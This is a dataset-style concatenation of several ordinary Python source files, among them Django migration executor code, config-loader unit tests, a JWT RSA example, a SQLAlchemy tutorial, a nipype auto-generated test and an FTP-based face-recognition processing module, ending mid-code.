"separate plans of only forwards OR backwards migrations.",
plan
)
elif all_forwards:
self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
else:
self._migrate_all_backwards(plan, full_plan, fake=fake)
self.check_replacements()
def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
migrations_to_run = {m[0] for m in plan}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
for migration, _ in full_plan:
if not migrations_to_run:
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
if self.progress_callback:
self.progress_callback("render_start")
state.apps # Render all -- performance critical
if self.progress_callback:
self.progress_callback("render_success")
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
def _migrate_all_backwards(self, plan, full_plan, fake):
migrations_to_run = {m[0] for m in plan}
# Holds all migration states prior to the migrations being unapplied
states = {}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
if self.progress_callback:
self.progress_callback("render_start")
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
state.apps
states[migration] = state
state = migration.mutate_state(state, preserve=True)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
if self.progress_callback:
self.progress_callback("render_success")
for migration, _ in plan:
self.unapply_migration(states[migration], migration, fake=fake)
def collect_sql(self, plan):
statements = []
state = None
for migration, backwards in plan:
with self.connection.schema_editor(collect_sql=True) as schema_editor:
if state is None:
state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
if not backwards:
state = migration.apply(state, schema_editor, collect_sql=True)
else:
state = migration.unapply(state, schema_editor, collect_sql=True)
statements.extend(schema_editor.collected_sql)
return statements
def apply_migration(self, state, migration, fake=False, fake_initial=False):
if self.progress_callback:
self.progress_callback("apply_start", migration, fake)
if not fake:
if fake_initial:
applied, state = self.detect_soft_applied(state, migration)
if applied:
fake = True
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.apply(state, schema_editor)
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_applied(app_label, name)
else:
self.recorder.record_applied(migration.app_label, migration.name)
if self.progress_callback:
self.progress_callback("apply_success", migration, fake)
return state
def unapply_migration(self, state, migration, fake=False):
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.unapply(state, schema_editor)
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
if migration.initial is None:
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
if model._meta.db_table not in self.connection.introspection.table_names(self.connection.cursor()):
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
table = model._meta.db_table
db_field = model._meta.get_field(operation.name).column
fields = self.connection.introspection.get_table_description(self.connection.cursor(), table)
if db_field not in (f.name for f in fields):
return False, project_state
found_add_field_migration = True
return (found_create_model_migration or found_add_field_migration), after_state
| true | true |
f72eafd27fb8361f96937936ad725718e5ac8bea | 3,705 | py | Python | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | null | null | null | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | 2 | 2022-03-31T03:01:39.000Z | 2022-03-31T03:02:48.000Z | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | null | null | null | from unittest import TestCase
from unittest.mock import patch
from dataclasses import dataclass
import yaml
from ..conf import (
get_config,
Namespace,
)
SRC = 'bat.conf'
EXAMPLE_CONFIG_YAML = '''
default: example
example:
bat:
key: value
remote_host:
api_key: example_api_key
url: https://api-example.host.io/
alt:
bat:
module:
key: alt_value
'''
EXAMPLE_CONFIG_DICT = yaml.load(EXAMPLE_CONFIG_YAML, Loader=yaml.BaseLoader)
class Test_get_config(TestCase):
def setUp(t):
patches = ['FileConfig', ]
for target in patches:
patcher = patch(f'{SRC}.{target}', autospec=True)
setattr(t, target, patcher.start())
t.addCleanup(patcher.stop)
t.config_file_data = {
'default': 'test_config',
'test_config': {
'bat': {
'AModule': {
'arg_1': 'conf_file_arg_1',
'arg_2': 'conf_file_arg_2',
},
'BModule': {'arg_1': '2020-20-21', },
}
}
}
@dataclass
class ConfA:
arg_1: str = 'dataclass_default_arg_1'
arg_2: str = 'dataclass_default_arg_2'
arg_3: str = 'dataclass_default_arg_3'
@dataclass
class ConfB:
arg_1: str = 'dataclass_default_isodate'
# As if imported from a module
ConfA.__module__ = 'bat.AModule'
ConfB.__module__ = 'bat.BModule'
@dataclass
class GlobalConfig:
AModule: ConfA
BModule: ConfB
config_file: str = './GlobalConfig.yaml'
GlobalConfig.__module__ = 'bat'
t.GlobalConfig = GlobalConfig
@patch(f'{SRC}.EnvConfig', autospec=True)
def test_default_values(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
CONF = get_config(t.GlobalConfig)
t.assertEqual(CONF.AModule.arg_3, 'dataclass_default_arg_3')
t.assertEqual(CONF.BModule.arg_1, 'dataclass_default_isodate')
def test_arg_cli_args(t):
cli_args = Namespace(arg_1='cli_arg_1')
conf = get_config(t.GlobalConfig, cli_args=cli_args)
t.assertEqual(conf.AModule.arg_1, 'cli_arg_1')
def test_arg_config_file(t):
'''The given config_file parameter is used for attribute lookups
'''
config_file = t.FileConfig.return_value
conf = get_config(t.GlobalConfig, config_file=config_file)
t.assertEqual(conf.AModule.arg_1, config_file.get.return_value)
config_file.get.assert_called_with('arg_1', module='bat.AModule')
def test_arg_config_file_name(t):
'''The given config_file_name is passed to the FileConfig constructor
'''
config_file_name = './test.config.yaml'
get_config(
t.GlobalConfig, config_file_name=config_file_name
)
t.FileConfig.assert_called_with(config_file_name, config_env=None)
def test_arg_config_env(t):
'''The given config_env name is passed to the FileConfig constructor
'''
config_env = 'configuration file environment'
get_config(t.GlobalConfig, config_env=config_env)
t.FileConfig.assert_called_with(None, config_env=config_env)
@patch(f'{SRC}.EnvConfig', autospec=True)
def test__getattr__missing_attribute(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
conf = get_config(t.GlobalConfig)
with t.assertRaises(AttributeError):
conf._sir_not_appearing_in_this_film
| 28.5 | 77 | 0.615115 | from unittest import TestCase
from unittest.mock import patch
from dataclasses import dataclass
import yaml
from ..conf import (
get_config,
Namespace,
)
SRC = 'bat.conf'
EXAMPLE_CONFIG_YAML = '''
default: example
example:
bat:
key: value
remote_host:
api_key: example_api_key
url: https://api-example.host.io/
alt:
bat:
module:
key: alt_value
'''
EXAMPLE_CONFIG_DICT = yaml.load(EXAMPLE_CONFIG_YAML, Loader=yaml.BaseLoader)
class Test_get_config(TestCase):
def setUp(t):
patches = ['FileConfig', ]
for target in patches:
patcher = patch(f'{SRC}.{target}', autospec=True)
setattr(t, target, patcher.start())
t.addCleanup(patcher.stop)
t.config_file_data = {
'default': 'test_config',
'test_config': {
'bat': {
'AModule': {
'arg_1': 'conf_file_arg_1',
'arg_2': 'conf_file_arg_2',
},
'BModule': {'arg_1': '2020-20-21', },
}
}
}
@dataclass
class ConfA:
arg_1: str = 'dataclass_default_arg_1'
arg_2: str = 'dataclass_default_arg_2'
arg_3: str = 'dataclass_default_arg_3'
@dataclass
class ConfB:
arg_1: str = 'dataclass_default_isodate'
ConfA.__module__ = 'bat.AModule'
ConfB.__module__ = 'bat.BModule'
@dataclass
class GlobalConfig:
AModule: ConfA
BModule: ConfB
config_file: str = './GlobalConfig.yaml'
GlobalConfig.__module__ = 'bat'
t.GlobalConfig = GlobalConfig
@patch(f'{SRC}.EnvConfig', autospec=True)
def test_default_values(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
CONF = get_config(t.GlobalConfig)
t.assertEqual(CONF.AModule.arg_3, 'dataclass_default_arg_3')
t.assertEqual(CONF.BModule.arg_1, 'dataclass_default_isodate')
def test_arg_cli_args(t):
cli_args = Namespace(arg_1='cli_arg_1')
conf = get_config(t.GlobalConfig, cli_args=cli_args)
t.assertEqual(conf.AModule.arg_1, 'cli_arg_1')
def test_arg_config_file(t):
config_file = t.FileConfig.return_value
conf = get_config(t.GlobalConfig, config_file=config_file)
t.assertEqual(conf.AModule.arg_1, config_file.get.return_value)
config_file.get.assert_called_with('arg_1', module='bat.AModule')
def test_arg_config_file_name(t):
config_file_name = './test.config.yaml'
get_config(
t.GlobalConfig, config_file_name=config_file_name
)
t.FileConfig.assert_called_with(config_file_name, config_env=None)
def test_arg_config_env(t):
config_env = 'configuration file environment'
get_config(t.GlobalConfig, config_env=config_env)
t.FileConfig.assert_called_with(None, config_env=config_env)
@patch(f'{SRC}.EnvConfig', autospec=True)
def test__getattr__missing_attribute(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
conf = get_config(t.GlobalConfig)
with t.assertRaises(AttributeError):
conf._sir_not_appearing_in_this_film
| true | true |
f72eb0729c8579621c30a4f80dbbabfa81283a19 | 99 | py | Python | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
| 33 | 78 | 0.777778 | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
| true | true |
f72eb080d6a45bd70ccbae966aa6a0f3c15c3a83 | 585 | py | Python | app/rsa.py | FusionAuth/-fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | 2 | 2022-01-04T15:52:31.000Z | 2022-02-01T12:23:10.000Z | app/rsa.py | FusionAuth/fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | null | null | null | app/rsa.py | FusionAuth/fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | null | null | null | import datetime
import python_jwt as jwt
import jwcrypto.jwk as jwk
def run():
key = jwk.JWK.generate(kty='RSA', size=2048)
# User API
payload = { "iss": "fusionauth.io",
"aud": "238d4793-70de-4183-9707-48ed8ecd19d9",
"sub": "19016b73-3ffa-4b26-80d8-aa9287738677",
"name": "Dan Moore",
"roles": ["RETRIEVE_TODOS"]
}
encoded = jwt.generate_jwt(payload, key, "RS256", datetime.timedelta(minutes=5))
print(encoded)
# Todo API
decoded = jwt.verify_jwt(encoded, key, ["RS256"])
print(decoded)
| 22.5 | 82 | 0.601709 | import datetime
import python_jwt as jwt
import jwcrypto.jwk as jwk
def run():
key = jwk.JWK.generate(kty='RSA', size=2048)
payload = { "iss": "fusionauth.io",
"aud": "238d4793-70de-4183-9707-48ed8ecd19d9",
"sub": "19016b73-3ffa-4b26-80d8-aa9287738677",
"name": "Dan Moore",
"roles": ["RETRIEVE_TODOS"]
}
encoded = jwt.generate_jwt(payload, key, "RS256", datetime.timedelta(minutes=5))
print(encoded)
decoded = jwt.verify_jwt(encoded, key, ["RS256"])
print(decoded)
| true | true |
f72eb0fe13ca1abff84f6656134223f774bee5b5 | 3,510 | py | Python | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from pprint import pprint
# Create an engine that stores data in the local directory's
# sqlalchemy_example.db file.
engine = create_engine('sqlite:////web/Sqlite-Data/example.db')
# this loads the sqlalchemy base class
Base = declarative_base()
# Setting up the classes that create the record objects and define the schema
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
# creates the field to store the person id
person_id = Column(Integer, ForeignKey('person.id'))
# creates the relationship between the person and addresses. backref adds a property to the Person class to retrieve addresses
person = relationship("Person", backref="addresses")
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
Base.metadata.create_all(engine)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person1 = Person(name='Keith')
session.add(new_person1)
new_person2 = Person(name='Joe')
session.add(new_person1)
new_person3 = Person(name='Steve')
session.add(new_person1)
session.commit()
# Insert an Address in the address table using a loop
addresses = [
Address(post_code='00001', person=new_person1),
Address(post_code='00002', person=new_person2),
Address(post_code='00003', person=new_person3),
]
# Loop through addresses and commit them to the database
for address in addresses:
session.add(address)
session.commit()
# joins Person on Address
all_people = session.query(Person).join(Address).all()
# Accessing a person with their address, You have to loop the addresses property and remember it was added by the
# backref on the addresses class
for person in all_people:
# use the __dict__ magic method to have the object print it's properties
pprint(person.__dict__)
for address in person.addresses:
pprint(address.__dict__)
# Retrieving the inverse of the relationship. Notice I reverse the Person and Address to load the Address table
all_addresses = session.query(Address).join(Person).all()
for address in all_addresses:
# showing how to use the print function with printing text and data at the same time easily
print(f'{address.person.name} has a postal code of {address.post_code}')
| 36.5625 | 131 | 0.759829 | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from pprint import pprint
# sqlalchemy_example.db file.
engine = create_engine('sqlite:////web/Sqlite-Data/example.db')
# this loads the sqlalchemy base class
Base = declarative_base()
# Setting up the classes that create the record objects and define the schema
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
# creates the field to store the person id
person_id = Column(Integer, ForeignKey('person.id'))
# creates the relationship between the person and addresses. backref adds a property to the Person class to retrieve addresses
person = relationship("Person", backref="addresses")
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
Base.metadata.create_all(engine)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person1 = Person(name='Keith')
session.add(new_person1)
new_person2 = Person(name='Joe')
session.add(new_person1)
new_person3 = Person(name='Steve')
session.add(new_person1)
session.commit()
# Insert an Address in the address table using a loop
addresses = [
Address(post_code='00001', person=new_person1),
Address(post_code='00002', person=new_person2),
Address(post_code='00003', person=new_person3),
]
# Loop through addresses and commit them to the database
for address in addresses:
session.add(address)
session.commit()
# joins Person on Address
all_people = session.query(Person).join(Address).all()
# Accessing a person with their address, You have to loop the addresses property and remember it was added by the
# backref on the addresses class
for person in all_people:
# use the __dict__ magic method to have the object print it's properties
pprint(person.__dict__)
for address in person.addresses:
pprint(address.__dict__)
all_addresses = session.query(Address).join(Person).all()
for address in all_addresses:
print(f'{address.person.name} has a postal code of {address.post_code}')
| true | true |
f72eb2bdfe5df62c8e4ef216181ab120564060ca | 934 | py | Python | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | 2 | 2017-10-05T21:08:38.000Z | 2018-10-09T23:01:23.000Z | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | 1 | 2016-10-11T19:18:53.000Z | 2016-10-11T19:18:53.000Z | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ...testing import assert_equal
from ..io import DataGrabber
def test_DataGrabber_inputs():
input_map = dict(base_directory=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
raise_on_empty=dict(usedefault=True,
),
sort_filelist=dict(mandatory=True,
),
template=dict(mandatory=True,
),
template_args=dict(),
)
inputs = DataGrabber.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_DataGrabber_outputs():
output_map = dict()
outputs = DataGrabber.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| 28.30303 | 78 | 0.679872 |
from ...testing import assert_equal
from ..io import DataGrabber
def test_DataGrabber_inputs():
input_map = dict(base_directory=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
raise_on_empty=dict(usedefault=True,
),
sort_filelist=dict(mandatory=True,
),
template=dict(mandatory=True,
),
template_args=dict(),
)
inputs = DataGrabber.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_DataGrabber_outputs():
output_map = dict()
outputs = DataGrabber.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| true | true |
f72eb2f1472da936493f1cf75785a6413c1e7e61 | 7,405 | py | Python | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | null | null | null | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | null | null | null | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | 1 | 2021-06-24T07:57:40.000Z | 2021-06-24T07:57:40.000Z | import os
from typing import List, Tuple, Dict
import face_recognition
from matplotlib import pyplot, patches
from PIL import Image
import numpy as np
from balticlsc.access.ftp import upload_file, get_connection
from balticlsc.configs.credential.ftp import FTPCredential
from balticlsc.scheme.api import init_baltic_api
from balticlsc.scheme.logger import logger
from balticlsc.scheme.pin import Pin, MissingPin, PinAttribute, ValuesAttribute
from balticlsc.scheme.processing import ProcessingInterface
from balticlsc.scheme.utils import camel_to_snake, get_random_output_folder
MODULE_VERSION = 'latest'
class Processing(ProcessingInterface):
def process(self, msg_uid: str, input_pin: Pin, output_pin_name_to_value: Dict[str, Pin]) -> None:
logger.info('module version = ' + MODULE_VERSION)
logger.info('starting processing for input pin="' + str(input_pin) + '"')
input_access_credential = input_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
input_folder = input_pin.getattr(PinAttribute.ACCESS_PATH)
if input_access_credential is None:
raise ValueError(f'missing access credential in the input pin={str(input_pin)}')
if input_folder is None:
raise ValueError(f'missing access path in the input pin={str(input_pin)}')
input_ftp_credential = FTPCredential(**input_access_credential)
# START # Establish the output access credential and folder # START #
output_pin_name: str = 'Output'
if output_pin_name not in output_pin_name_to_value:
error_msg = 'missing pin with name="' + output_pin_name + '" in output pins config'
logger.error(error_msg)
raise MissingPin([pin for pin in output_pin_name_to_value.values()], error_msg)
output_pin = output_pin_name_to_value[output_pin_name]
logger.info('loading output pin=' + str(output_pin))
output_access_credential = output_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
if output_access_credential is None:
logger.info('output pin access credentials is None, using input access credentials')
output_ftp_credential = input_ftp_credential
else:
output_access_credential = {camel_to_snake(key): value for key, value in output_access_credential.items()}
if str(output_access_credential) == str(input_access_credential):
logger.info('input and output access credential are the same')
output_ftp_credential = input_ftp_credential
else:
output_ftp_credential = FTPCredential(**output_access_credential)
output_access_path = output_pin.getattr(PinAttribute.ACCESS_PATH)
if output_access_path is None:
logger.info('access path is not provided in output config')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_access_path = {camel_to_snake(key): value for key, value in output_access_path.items()}
if 'resource_path' not in output_access_path:
logger.info('missing "resource_path" value in output access path')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_folder = output_access_path['resource_path']
logger.info('setting output folder based on output pin config "resource_path"=' + output_folder)
# STOP # Establish output credentials and folder # STOP #
logger.info('connecting to input ftp server: ' + input_ftp_credential.host)
input_ftp = get_connection(input_ftp_credential)
if output_ftp_credential != input_ftp_credential:
logger.info('connecting to output ftp server: ' + output_ftp_credential.host)
output_ftp = get_connection(output_ftp_credential)
else:
logger.info('using the same connection as output ftp')
output_ftp = input_ftp
# START # process and send files # START #
logger.info('changing ftp working directory to "' + input_folder + '"')
input_ftp.cwd(input_folder)
logger.info('working directory changed')
logger.info('listing files in the working directory ...')
filenames: List[str] = input_ftp.nlst()
logger.info('handling ' + str(len(filenames)) + ' files')
os.makedirs('tmp', exist_ok=True)
for filename in filenames:
if not filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
logger.warning('wrong format of the file "' + filename + '", omitting')
continue
logger.info('downloading file "' + filename + '"')
filepath = 'tmp/' + filename
# Save the image locally
with open(filepath, 'wb') as file:
input_ftp.retrbinary("RETR " + filename, file.write)
# Mark faces and save the image
image = np.array(Image.open(filepath))
im = Image.fromarray(image)
im.save(filepath)
height: int = image.shape[0]
width: int = image.shape[1]
dpi: int = 100
faces_coords: List[Tuple[int]] = face_recognition.face_locations(image)
figure = pyplot.figure(frameon=False, dpi=dpi)
figure.set_size_inches(width / dpi, height / dpi)
ax = pyplot.Axes(figure, [0., 0., 1., 1.])
ax.set_axis_off()
figure.add_axes(ax)
ax.imshow(image)
logger.info('adding ' + str(len(faces_coords)) + ' faces to image "' + filename + '"')
fig = pyplot.gcf()
fig.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
for index in range(len(faces_coords)):
x_start = faces_coords[index][3]
y_start = faces_coords[index][0]
x_width = (faces_coords[index][1] - faces_coords[index][3])
y_height = (faces_coords[index][2] - faces_coords[index][0])
rect = patches.Rectangle((x_start, y_start), x_width, y_height,
edgecolor='r', facecolor="none")
ax.add_patch(rect)
pyplot.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
pyplot.close()
# Send file to ftp
with open(filepath, 'rb') as file:
logger.info('uploading file "' + filename + '" into ' + output_folder)
upload_file(filename, output_folder, output_ftp, file)
file.close() # close file and FTP
input_ftp.cwd(input_folder)
# STOP # process and send files # STOP #
input_ftp.quit()
if output_ftp_credential != input_ftp_credential:
output_ftp.quit()
rest_client.send_output_token(
base_msg_uid=msg_uid,
values={
ValuesAttribute.RESOURCE_PATH: output_folder
},
output_pin_name=output_pin.getattr(PinAttribute.NAME))
rest_client.send_ack_token(
msg_uids=[msg_uid],
is_final=True,
is_failed=False,
)
app, rest_client = init_baltic_api(Processing)
| 45.709877 | 118 | 0.640648 | import os
from typing import List, Tuple, Dict
import face_recognition
from matplotlib import pyplot, patches
from PIL import Image
import numpy as np
from balticlsc.access.ftp import upload_file, get_connection
from balticlsc.configs.credential.ftp import FTPCredential
from balticlsc.scheme.api import init_baltic_api
from balticlsc.scheme.logger import logger
from balticlsc.scheme.pin import Pin, MissingPin, PinAttribute, ValuesAttribute
from balticlsc.scheme.processing import ProcessingInterface
from balticlsc.scheme.utils import camel_to_snake, get_random_output_folder
MODULE_VERSION = 'latest'
class Processing(ProcessingInterface):
def process(self, msg_uid: str, input_pin: Pin, output_pin_name_to_value: Dict[str, Pin]) -> None:
logger.info('module version = ' + MODULE_VERSION)
logger.info('starting processing for input pin="' + str(input_pin) + '"')
input_access_credential = input_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
input_folder = input_pin.getattr(PinAttribute.ACCESS_PATH)
if input_access_credential is None:
raise ValueError(f'missing access credential in the input pin={str(input_pin)}')
if input_folder is None:
raise ValueError(f'missing access path in the input pin={str(input_pin)}')
input_ftp_credential = FTPCredential(**input_access_credential)
t in output_pin_name_to_value:
error_msg = 'missing pin with name="' + output_pin_name + '" in output pins config'
logger.error(error_msg)
raise MissingPin([pin for pin in output_pin_name_to_value.values()], error_msg)
output_pin = output_pin_name_to_value[output_pin_name]
logger.info('loading output pin=' + str(output_pin))
output_access_credential = output_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
if output_access_credential is None:
logger.info('output pin access credentials is None, using input access credentials')
output_ftp_credential = input_ftp_credential
else:
output_access_credential = {camel_to_snake(key): value for key, value in output_access_credential.items()}
if str(output_access_credential) == str(input_access_credential):
logger.info('input and output access credential are the same')
output_ftp_credential = input_ftp_credential
else:
output_ftp_credential = FTPCredential(**output_access_credential)
output_access_path = output_pin.getattr(PinAttribute.ACCESS_PATH)
if output_access_path is None:
logger.info('access path is not provided in output config')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_access_path = {camel_to_snake(key): value for key, value in output_access_path.items()}
if 'resource_path' not in output_access_path:
logger.info('missing "resource_path" value in output access path')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_folder = output_access_path['resource_path']
logger.info('setting output folder based on output pin config "resource_path"=' + output_folder)
nput_ftp_credential.host)
input_ftp = get_connection(input_ftp_credential)
if output_ftp_credential != input_ftp_credential:
logger.info('connecting to output ftp server: ' + output_ftp_credential.host)
output_ftp = get_connection(output_ftp_credential)
else:
logger.info('using the same connection as output ftp')
output_ftp = input_ftp
irectory to "' + input_folder + '"')
input_ftp.cwd(input_folder)
logger.info('working directory changed')
logger.info('listing files in the working directory ...')
filenames: List[str] = input_ftp.nlst()
logger.info('handling ' + str(len(filenames)) + ' files')
os.makedirs('tmp', exist_ok=True)
for filename in filenames:
if not filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
logger.warning('wrong format of the file "' + filename + '", omitting')
continue
logger.info('downloading file "' + filename + '"')
filepath = 'tmp/' + filename
with open(filepath, 'wb') as file:
input_ftp.retrbinary("RETR " + filename, file.write)
image = np.array(Image.open(filepath))
im = Image.fromarray(image)
im.save(filepath)
height: int = image.shape[0]
width: int = image.shape[1]
dpi: int = 100
faces_coords: List[Tuple[int]] = face_recognition.face_locations(image)
figure = pyplot.figure(frameon=False, dpi=dpi)
figure.set_size_inches(width / dpi, height / dpi)
ax = pyplot.Axes(figure, [0., 0., 1., 1.])
ax.set_axis_off()
figure.add_axes(ax)
ax.imshow(image)
logger.info('adding ' + str(len(faces_coords)) + ' faces to image "' + filename + '"')
fig = pyplot.gcf()
fig.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
for index in range(len(faces_coords)):
x_start = faces_coords[index][3]
y_start = faces_coords[index][0]
x_width = (faces_coords[index][1] - faces_coords[index][3])
y_height = (faces_coords[index][2] - faces_coords[index][0])
rect = patches.Rectangle((x_start, y_start), x_width, y_height,
edgecolor='r', facecolor="none")
ax.add_patch(rect)
pyplot.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
pyplot.close()
with open(filepath, 'rb') as file:
logger.info('uploading file "' + filename + '" into ' + output_folder)
upload_file(filename, output_folder, output_ftp, file)
file.close()
input_ftp.cwd(input_folder)
ut_ftp_credential != input_ftp_credential:
output_ftp.quit()
rest_client.send_output_token(
base_msg_uid=msg_uid,
values={
